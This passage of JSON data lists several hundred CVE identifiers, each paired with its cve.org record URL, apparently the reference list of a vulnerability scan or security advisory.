"url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
},
{
"name": "CVE-2017-13693",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-13693"
},
{
"name": "CVE-2025-68768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68768"
},
{
"name": "CVE-2024-50284",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50284"
},
{
"name": "CVE-2022-49306",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49306"
},
{
"name": "CVE-2024-49898",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49898"
},
{
"name": "CVE-2025-36423",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36423"
},
{
"name": "CVE-2022-49622",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49622"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2024-50211",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50211"
},
{
"name": "CVE-2025-38507",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38507"
},
{
"name": "CVE-2022-50284",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50284"
},
{
"name": "CVE-2025-39989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39989"
},
{
"name": "CVE-2023-6240",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6240"
},
{
"name": "CVE-2025-38014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38014"
},
{
"name": "CVE-2025-22028",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22028"
},
{
"name": "CVE-2024-41008",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41008"
},
{
"name": "CVE-2024-27035",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27035"
},
{
"name": "CVE-2023-53218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53218"
},
{
"name": "CVE-2022-25836",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25836"
},
{
"name": "CVE-2024-37354",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37354"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2025-29934",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29934"
},
{
"name": "CVE-2024-27005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27005"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2022-49133",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49133"
},
{
"name": "CVE-2024-36951",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36951"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2025-38438",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38438"
},
{
"name": "CVE-2025-40032",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40032"
},
{
"name": "CVE-2023-26555",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26555"
},
{
"name": "CVE-2023-1193",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1193"
},
{
"name": "CVE-2025-71220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71220"
},
{
"name": "CVE-2024-46806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46806"
},
{
"name": "CVE-2022-50073",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50073"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2025-5278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5278"
},
{
"name": "CVE-2026-23103",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23103"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-68786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68786"
},
{
"name": "CVE-2025-39732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39732"
},
{
"name": "CVE-2022-50393",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50393"
},
{
"name": "CVE-2025-68779",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68779"
},
{
"name": "CVE-2024-56433",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
},
{
"name": "CVE-2025-21819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21819"
},
{
"name": "CVE-2025-48514",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48514"
},
{
"name": "CVE-2024-41030",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41030"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2024-47664",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47664"
},
{
"name": "CVE-2024-36915",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36915"
},
{
"name": "CVE-2026-25749",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25749"
},
{
"name": "CVE-2024-49504",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49504"
},
{
"name": "CVE-2025-38118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38118"
},
{
"name": "CVE-2023-0464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
},
{
"name": "CVE-2023-53367",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53367"
},
{
"name": "CVE-2022-50500",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50500"
},
{
"name": "CVE-2019-14899",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14899"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2024-53098",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53098"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2024-49968",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49968"
},
{
"name": "CVE-2025-68358",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68358"
},
{
"name": "CVE-2025-40206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40206"
},
{
"name": "CVE-2026-23180",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23180"
},
{
"name": "CVE-2021-0164",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0164"
},
{
"name": "CVE-2026-26958",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26958"
},
{
"name": "CVE-2024-46870",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46870"
},
{
"name": "CVE-2022-49178",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49178"
},
{
"name": "CVE-2024-22195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22195"
},
{
"name": "CVE-2023-23931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23931"
},
{
"name": "CVE-2024-49929",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49929"
},
{
"name": "CVE-2025-40257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40257"
},
{
"name": "CVE-2023-53748",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53748"
},
{
"name": "CVE-2024-26740",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26740"
},
{
"name": "CVE-2022-49173",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49173"
},
{
"name": "CVE-2024-45781",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45781"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2025-21947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21947"
},
{
"name": "CVE-2024-53056",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53056"
},
{
"name": "CVE-2022-50551",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50551"
},
{
"name": "CVE-2026-26269",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26269"
},
{
"name": "CVE-2024-43872",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43872"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2022-49401",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49401"
},
{
"name": "CVE-2025-71069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71069"
},
{
"name": "CVE-2025-68312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68312"
},
{
"name": "CVE-2025-68284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68284"
},
{
"name": "CVE-2025-68194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68194"
},
{
"name": "CVE-2023-52939",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52939"
},
{
"name": "CVE-2024-14027",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-14027"
},
{
"name": "CVE-2025-38269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38269"
},
{
"name": "CVE-2025-69649",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69649"
},
{
"name": "CVE-2024-53175",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53175"
},
{
"name": "CVE-2025-21734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21734"
},
{
"name": "CVE-2024-49859",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49859"
},
{
"name": "CVE-2025-40336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40336"
},
{
"name": "CVE-2025-37945",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37945"
},
{
"name": "CVE-2025-71195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71195"
},
{
"name": "CVE-2022-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49766"
},
{
"name": "CVE-2025-6141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6141"
},
{
"name": "CVE-2025-22043",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22043"
},
{
"name": "CVE-2024-49569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49569"
},
{
"name": "CVE-2025-61984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61984"
},
{
"name": "CVE-2023-52569",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52569"
},
{
"name": "CVE-2024-56609",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56609"
},
{
"name": "CVE-2022-49940",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49940"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2025-38422",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38422"
},
{
"name": "CVE-2024-56611",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56611"
},
{
"name": "CVE-2025-21927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21927"
},
{
"name": "CVE-2026-23088",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23088"
},
{
"name": "CVE-2020-25743",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25743"
},
{
"name": "CVE-2022-50167",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50167"
},
{
"name": "CVE-2025-68183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68183"
},
{
"name": "CVE-2026-27704",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27704"
},
{
"name": "CVE-2022-48064",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48064"
},
{
"name": "CVE-2023-45896",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45896"
},
{
"name": "CVE-2025-37903",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37903"
},
{
"name": "CVE-2025-68161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2024-49940",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49940"
},
{
"name": "CVE-2025-40263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40263"
},
{
"name": "CVE-2021-3735",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3735"
},
{
"name": "CVE-2025-40353",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40353"
},
{
"name": "CVE-2024-46861",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46861"
},
{
"name": "CVE-2025-40222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40222"
},
{
"name": "CVE-2022-50634",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50634"
},
{
"name": "CVE-2025-52881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52881"
},
{
"name": "CVE-2025-54514",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54514"
},
{
"name": "CVE-2025-71202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71202"
},
{
"name": "CVE-2015-7837",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7837"
},
{
"name": "CVE-2025-0677",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0677"
},
{
"name": "CVE-2024-45780",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45780"
},
{
"name": "CVE-2024-46749",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46749"
},
{
"name": "CVE-2022-50492",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50492"
},
{
"name": "CVE-2024-49888",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49888"
},
{
"name": "CVE-2022-50406",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50406"
},
{
"name": "CVE-2023-26552",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26552"
},
{
"name": "CVE-2024-49921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49921"
},
{
"name": "CVE-2024-5535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5535"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-71180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71180"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-68244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68244"
},
{
"name": "CVE-2025-59691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59691"
},
{
"name": "CVE-2024-46830",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46830"
},
{
"name": "CVE-2023-52481",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52481"
},
{
"name": "CVE-2023-52888",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52888"
},
{
"name": "CVE-2025-22057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22057"
},
{
"name": "CVE-2024-47666",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47666"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2025-40278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40278"
},
{
"name": "CVE-2023-0160",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0160"
},
{
"name": "CVE-2024-50056",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50056"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2026-1788",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1788"
},
{
"name": "CVE-2023-53721",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53721"
},
{
"name": "CVE-2025-22113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22113"
},
{
"name": "CVE-2025-40342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40342"
},
{
"name": "CVE-2022-50256",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50256"
},
{
"name": "CVE-2024-42091",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42091"
},
{
"name": "CVE-2024-27983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27983"
},
{
"name": "CVE-2025-37907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37907"
},
{
"name": "CVE-2024-38625",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38625"
},
{
"name": "CVE-2025-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23085"
},
{
"name": "CVE-2026-22796",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22796"
},
{
"name": "CVE-2023-4010",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4010"
},
{
"name": "CVE-2025-38425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38425"
},
{
"name": "CVE-2024-46727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46727"
},
{
"name": "CVE-2023-54028",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54028"
},
{
"name": "CVE-2024-42129",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42129"
},
{
"name": "CVE-2023-54105",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54105"
},
{
"name": "CVE-2018-17977",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-17977"
},
{
"name": "CVE-2019-1010204",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-1010204"
},
{
"name": "CVE-2023-53992",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53992"
},
{
"name": "CVE-2026-26960",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26960"
},
{
"name": "CVE-2025-40210",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40210"
},
{
"name": "CVE-2022-50354",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50354"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2025-21812",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21812"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2025-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12801"
},
{
"name": "CVE-2024-58015",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58015"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2024-41079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41079"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2024-43823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43823"
},
{
"name": "CVE-2023-52589",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52589"
},
{
"name": "CVE-2022-41848",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41848"
},
{
"name": "CVE-2026-23216",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23216"
},
{
"name": "CVE-2023-53434",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53434"
},
{
"name": "CVE-2023-29935",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29935"
},
{
"name": "CVE-2023-35061",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35061"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2025-71225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71225"
},
{
"name": "CVE-2026-21636",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21636"
},
{
"name": "CVE-2026-23239",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23239"
},
{
"name": "CVE-2021-0172",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0172"
},
{
"name": "CVE-2024-47662",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47662"
},
{
"name": "CVE-2018-12930",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12930"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2024-49970",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49970"
},
{
"name": "CVE-2024-41067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41067"
},
{
"name": "CVE-2024-26844",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26844"
},
{
"name": "CVE-2025-23141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23141"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2025-40193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40193"
},
{
"name": "CVE-2023-32644",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32644"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2025-21908",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21908"
},
{
"name": "CVE-2024-46681",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46681"
},
{
"name": "CVE-2024-36927",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36927"
},
{
"name": "CVE-2025-61732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61732"
},
{
"name": "CVE-2025-61723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
},
{
"name": "CVE-2025-9232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
},
{
"name": "CVE-2025-40012",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40012"
},
{
"name": "CVE-2025-40279",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40279"
},
{
"name": "CVE-2026-0964",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0964"
},
{
"name": "CVE-2025-68328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68328"
},
{
"name": "CVE-2023-53178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53178"
},
{
"name": "CVE-2024-47141",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47141"
},
{
"name": "CVE-2024-8354",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8354"
},
{
"name": "CVE-2023-54323",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54323"
},
{
"name": "CVE-2025-37952",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37952"
},
{
"name": "CVE-2023-45803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
},
{
"name": "CVE-2025-0689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0689"
},
{
"name": "CVE-2022-50316",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50316"
},
{
"name": "CVE-2023-31347",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31347"
},
{
"name": "CVE-2025-40084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40084"
},
{
"name": "CVE-2025-22111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22111"
},
{
"name": "CVE-2023-53657",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53657"
},
{
"name": "CVE-2024-49915",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49915"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2025-55132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55132"
},
{
"name": "CVE-2023-52732",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52732"
},
{
"name": "CVE-2022-49759",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49759"
},
{
"name": "CVE-2025-61795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61795"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2022-49167",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49167"
},
{
"name": "CVE-2025-68311",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68311"
},
{
"name": "CVE-2026-27903",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27903"
},
{
"name": "CVE-2023-54023",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54023"
},
{
"name": "CVE-2024-27056",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27056"
},
{
"name": "CVE-2023-31082",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31082"
},
{
"name": "CVE-2024-41088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41088"
},
{
"name": "CVE-2025-0690",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0690"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2023-53052",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53052"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2022-49234",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49234"
},
{
"name": "CVE-2022-50163",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50163"
},
{
"name": "CVE-2024-36922",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36922"
},
{
"name": "CVE-2025-71067",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71067"
},
{
"name": "CVE-2024-49919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49919"
},
{
"name": "CVE-2026-23238",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23238"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2020-26556",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26556"
},
{
"name": "CVE-2025-46394",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46394"
},
{
"name": "CVE-2025-66471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66471"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2025-40341",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40341"
},
{
"name": "CVE-2025-38409",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38409"
},
{
"name": "CVE-2021-3826",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3826"
},
{
"name": "CVE-2024-26699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26699"
},
{
"name": "CVE-2024-57876",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57876"
},
{
"name": "CVE-2024-58019",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58019"
},
{
"name": "CVE-2026-25679",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2025-14017",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14017"
},
{
"name": "CVE-2022-50390",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50390"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2026-21441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2025-71186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71186"
},
{
"name": "CVE-2024-53220",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53220"
},
{
"name": "CVE-2026-23176",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23176"
},
{
"name": "CVE-2023-53539",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53539"
},
{
"name": "CVE-2025-13836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13836"
},
{
"name": "CVE-2025-40338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40338"
},
{
"name": "CVE-2025-68821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68821"
},
{
"name": "CVE-2025-31648",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31648"
},
{
"name": "CVE-2025-0678",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0678"
},
{
"name": "CVE-2024-41075",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41075"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2024-56674",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56674"
},
{
"name": "CVE-2024-27982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27982"
},
{
"name": "CVE-2025-40195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40195"
},
{
"name": "CVE-2024-31884",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31884"
},
{
"name": "CVE-2025-21976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21976"
},
{
"name": "CVE-2019-1563",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-1563"
},
{
"name": "CVE-2026-1002",
